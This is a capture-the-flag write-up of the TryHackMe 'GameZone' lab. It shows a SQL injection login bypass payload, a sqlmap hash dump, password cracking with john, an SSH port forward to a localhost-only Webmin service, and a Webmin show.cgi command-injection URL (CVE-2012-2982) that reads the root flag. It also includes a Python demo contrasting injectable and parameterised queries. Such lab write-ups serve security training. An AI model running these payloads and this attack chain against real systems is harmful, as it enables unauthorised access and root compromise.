TryHackMe Medium Linux SQLi SQLMap Webmin SSH Tunneling

GameZone

SQLi login bypass; hash dump with SQLMap, cracked with john; access to Webmin over SSH port forwarding for RCE as root.

cat4clysm
Tools used
nmap sqlmap john ssh netcat

Scanning

root@kali:~$
nmap -sC -sV -p 22,80 10.10.196.59 -oN targeted
(screenshot: nmap scan output)

SQLi - Login Bypass

The login page is vulnerable to SQL injection. The single quote closes the string literal the application built around our input, `or 1=1` makes the WHERE clause true for every row, and `-- -` comments out the rest of the query, including the password comparison, so the application accepts the first user it finds:

Login: 'or 1=1 -- -
Password: ' or 1=1 -- -
(screenshot: login bypass, portal logged in)
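To make the bypass concrete, the following is an added example (not code from the original writeup or from the GameZone box) that rebuilds the kind of query the portal must be running against an in-memory SQLite table. The table contents, the column names and the assumption that the application hashes the submitted password before comparing it are all constructed for the demo; the user agent47 and the password videogamer124 are the ones used later in this writeup.

```python
import hashlib
import sqlite3


def sha256_hex(text: str) -> str:
    """Unsalted hex SHA-256, the format the portal stores in its users table."""
    return hashlib.sha256(text.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the portal's users table (schema is an assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?)",
        ("agent47", sha256_hex("videogamer124")),
    )
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """Login as the portal does it: user input is pasted straight into the SQL.

    Hashing the password does not help here; the injection lands in the
    username field, and `-- -` throws away the AND pwd = ... comparison.
    """
    query = (
        "SELECT username FROM users WHERE username = '%s' AND pwd = '%s'"
        % (username, sha256_hex(password))
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Same check with bound parameters: the quote and comment are just data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pwd = ?",
        (username, sha256_hex(password)),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "' or 1=1 -- -"
    print("vulnerable:", vulnerable_login(make_db(), payload, "anything"))
    print("parameterised:", safe_login(make_db(), payload, "anything"))
```

With the payload in the username field the vulnerable query collapses to `... WHERE username = '' or 1=1` and the first row (agent47) comes back as the logged-in user; the parameterised version returns nothing because the payload is compared literally against the username column.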

SQLMap - Hash Dump

We intercept the login request with Burp Suite, save it to a file and hand it to SQLMap (its -r option takes a raw request file) to enumerate and dump the database. The dump contains a users table with a SHA-256 password hash, which we save to a file and crack with john:

(screenshot: Burp request fed to SQLMap)
root@kali:~$
john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
# Raw-SHA256 = unsalted hex SHA-256; passing --format explicitly avoids john guessing the wrong type
(screenshot: john cracked the hash)
# password: videogamer124

SSH + Port Forwarding - Webmin

The cracked password is reused for SSH as the user from the dump:

root@kali:~$
ssh agent47@10.10.196.59
# password: videogamer124

Once on the box we list listening sockets. Port 10000 is bound to localhost only, so the service behind it (Webmin) is not reachable from our attacking machine directly:

root@kali:~$
ss -tulpn
(screenshot: listening ports, 10000 on localhost)

A local SSH port forward binds port 10000 on Kali and carries it through the SSH session to 127.0.0.1:10000 on the target, so http://localhost:10000 on Kali reaches Webmin. The same agent47 / videogamer124 credentials log us into Webmin:

root@kali:~$
ssh -L 10000:localhost:10000 agent47@10.10.196.59
(screenshot: Webmin login, exploit read-up)

RCE in Webmin via /file/show.cgi (CVE-2012-2982): the file viewer hands the requested path to Perl's open(), which treats a trailing | as a command to run, and Webmin runs as root, so the injected command reads the root flag:

http://localhost:10000/file/show.cgi/bin/7|cat /root/root.txt|
(screenshot: Webmin RCE, root.txt displayed)

Lessons learned